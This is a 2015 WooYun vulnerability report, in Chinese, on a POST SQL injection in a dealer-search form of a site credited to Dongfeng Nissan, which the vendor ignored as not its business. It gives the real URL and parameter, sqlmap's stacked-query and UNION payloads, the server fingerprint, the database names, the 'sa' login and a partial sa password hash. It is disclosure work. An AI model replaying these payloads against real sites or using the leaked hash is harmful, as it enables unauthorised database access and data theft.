漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0134035
漏洞标题:东风日产某分站sql注入漏洞(sa权限)
相关厂商:东风日产乘用车公司
漏洞作者: 日出东方
提交时间:2015-08-14 09:15
修复时间:2015-08-14 09:53
公开时间:2015-08-14 09:53
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-14: 细节已通知厂商并且等待厂商处理中
2015-08-14: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
rt
不知道重复没
菜鸟挖洞不容易呀
详细说明:
http://www.dfcv.com.cn/Service.aspx
4s店查询那里 post 注入
参数 ctl00%24MainContent%24txtDealerName
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ctl00$MainContent$txtDealerName (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=/wEPDwULLTExOTg5MjA2OTgPZBYCZg9kFgICAw9kFgJmD2QWCAIBD2Q
WCgIBDxYCHgVjbGFzc2VkAgMPFgIfAGVkAgUPFgIfAAUFaG92ZXJkAgcPFgIfAGVkAgkPFgIfAGVkAgM
PEA8WBh4NRGF0YVRleHRGaWVsZAUMUHJvdmluY2VOYW1lHg5EYXRhVmFsdWVGaWVsZAUKUHJvdmluY2V
JRB4LXyFEYXRhQm91bmRnZBAVJA/or7fpgInmi6nnnIHku70J5YyX5Lqs5biCCeWkqea0peW4ggnmsrP
ljJfnnIEJ5bGx6KW/55yBCeWGheiSmeWMugnovr3lroHnnIEJ5ZCJ5p6X55yBDOm7kem+meaxn+ecgQn
kuIrmtbfluIIJ5rGf6IuP55yBCeWuieW+veecgQnmtZnmsZ/nnIEJ56aP5bu655yBCeaxn+ilv+ecgQn
lsbHkuJznnIEJ5rKz5Y2X55yBCea5luWMl+ecgQnmuZbljZfnnIEJ5bm/5Lic55yBCeW5v+ilv+WMugn
mtbfljZfnnIEJ5Zub5bed55yBCeS6keWNl+ecgQnotLXlt57nnIEJ6KW/6JeP5Yy6CemZleilv+ecgQn
nlJjogoPnnIEJ6Z2S5rW355yBCeWugeWkj+WMugnmlrDnlobljLoJ6YeN5bqG5biCBummmea4rwbmvrP
pl6gG5Y+w5rm+BuWbveWklhUkAAExATIBMwE0ATUBNgE3ATgBOQIxMAIxMQIxMgIxMwIxNAIxNQIxNgI
xNwIxOAIxOQIyMAIyMQIyMgIyMwIyNAIyNQIyNgIyNwIyOAIyOQIzMAIzMQIzMgIzMwIzNAIzNRQrAyR
nZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAIJDxYCHgtfIUl0ZW1Db3VudGZkAgs
PDxYCHgtSZWNvcmRjb3VudGZkZGSO28Yzywapkf574ZbtaeGXGzhhYmG3nF1YmxMhOQrJKg==&__EVEN
TVALIDATION=/wEWJwLBkabeBwL445+1BwL3jLXbCwL2jLXbCwL1jLXbCwL0jLXbCwLzjLXbCwLyjLXb
CwLxjLXbCwLgjLXbCwLvjLXbCwL3jPXYCwL3jPnYCwL3jP3YCwL3jMHYCwL3jMXYCwL3jMnYCwL3jM3Y
CwL3jNHYCwL3jJXbCwL3jJnbCwL2jPXYCwL2jPnYCwL2jP3YCwL2jMHYCwL2jMXYCwL2jMnYCwL2jM3Y
CwL2jNHYCwL2jJXbCwL2jJnbCwL1jPXYCwL1jPnYCwL1jP3YCwL1jMHYCwL1jMXYCwL1jMnYCwKMkfXV
CAKjkJHZAqiugOxWThMVC+5R6g080+Hhc51nJm9KnzY585p+nI1R&ctl00$MainContent$ddlProvin
ce=&ctl00$MainContent$txtDealerName=a';WAITFOR DELAY '0:0:5'--&ctl00$MainContent
$btnSearch=
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: __VIEWSTATE=/wEPDwULLTExOTg5MjA2OTgPZBYCZg9kFgICAw9kFgJmD2QWCAIBD2Q
WCgIBDxYCHgVjbGFzc2VkAgMPFgIfAGVkAgUPFgIfAAUFaG92ZXJkAgcPFgIfAGVkAgkPFgIfAGVkAgM
PEA8WBh4NRGF0YVRleHRGaWVsZAUMUHJvdmluY2VOYW1lHg5EYXRhVmFsdWVGaWVsZAUKUHJvdmluY2V
JRB4LXyFEYXRhQm91bmRnZBAVJA/or7fpgInmi6nnnIHku70J5YyX5Lqs5biCCeWkqea0peW4ggnmsrP
ljJfnnIEJ5bGx6KW/55yBCeWGheiSmeWMugnovr3lroHnnIEJ5ZCJ5p6X55yBDOm7kem+meaxn+ecgQn
kuIrmtbfluIIJ5rGf6IuP55yBCeWuieW+veecgQnmtZnmsZ/nnIEJ56aP5bu655yBCeaxn+ilv+ecgQn
lsbHkuJznnIEJ5rKz5Y2X55yBCea5luWMl+ecgQnmuZbljZfnnIEJ5bm/5Lic55yBCeW5v+ilv+WMugn
mtbfljZfnnIEJ5Zub5bed55yBCeS6keWNl+ecgQnotLXlt57nnIEJ6KW/6JeP5Yy6CemZleilv+ecgQn
nlJjogoPnnIEJ6Z2S5rW355yBCeWugeWkj+WMugnmlrDnlobljLoJ6YeN5bqG5biCBummmea4rwbmvrP
pl6gG5Y+w5rm+BuWbveWklhUkAAExATIBMwE0ATUBNgE3ATgBOQIxMAIxMQIxMgIxMwIxNAIxNQIxNgI
xNwIxOAIxOQIyMAIyMQIyMgIyMwIyNAIyNQIyNgIyNwIyOAIyOQIzMAIzMQIzMgIzMwIzNAIzNRQrAyR
nZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAIJDxYCHgtfIUl0ZW1Db3VudGZkAgs
PDxYCHgtSZWNvcmRjb3VudGZkZGSO28Yzywapkf574ZbtaeGXGzhhYmG3nF1YmxMhOQrJKg==&__EVEN
TVALIDATION=/wEWJwLBkabeBwL445+1BwL3jLXbCwL2jLXbCwL1jLXbCwL0jLXbCwLzjLXbCwLyjLXb
CwLxjLXbCwLgjLXbCwLvjLXbCwL3jPXYCwL3jPnYCwL3jP3YCwL3jMHYCwL3jMXYCwL3jMnYCwL3jM3Y
CwL3jNHYCwL3jJXbCwL3jJnbCwL2jPXYCwL2jPnYCwL2jP3YCwL2jMHYCwL2jMXYCwL2jMnYCwL2jM3Y
CwL2jNHYCwL2jJXbCwL2jJnbCwL1jPXYCwL1jPnYCwL1jP3YCwL1jMHYCwL1jMXYCwL1jMnYCwKMkfXV
CAKjkJHZAqiugOxWThMVC+5R6g080+Hhc51nJm9KnzY585p+nI1R&ctl00$MainContent$ddlProvin
ce=&ctl00$MainContent$txtDealerName=a' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL
,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(83)+CHAR(108)+
CHAR(65)+CHAR(68)+CHAR(110)+CHAR(106)+CHAR(85)+CHAR(82)+CHAR(98)+CHAR(76)+CHAR(1
13)+CHAR(98)+CHAR(120)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL-- &ctl00$MainContent$btnSearch=
---
[08:57:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
7个库
available databases [7]:
[*] CVWeb
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
current user: 'sa'
password hash: 0x0100620e9c8157e54f7a50db7374f1--5c7aef6095f89561f842
没有试能不能执行命令,只是挖洞。。
over++
漏洞证明:
rt
修复方案:
121
版权声明:转载请注明来源 日出东方@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-08-14 09:53
厂商回复:
感谢提醒!但是该站不属于我司业务管辖范围。
最新状态:
暂无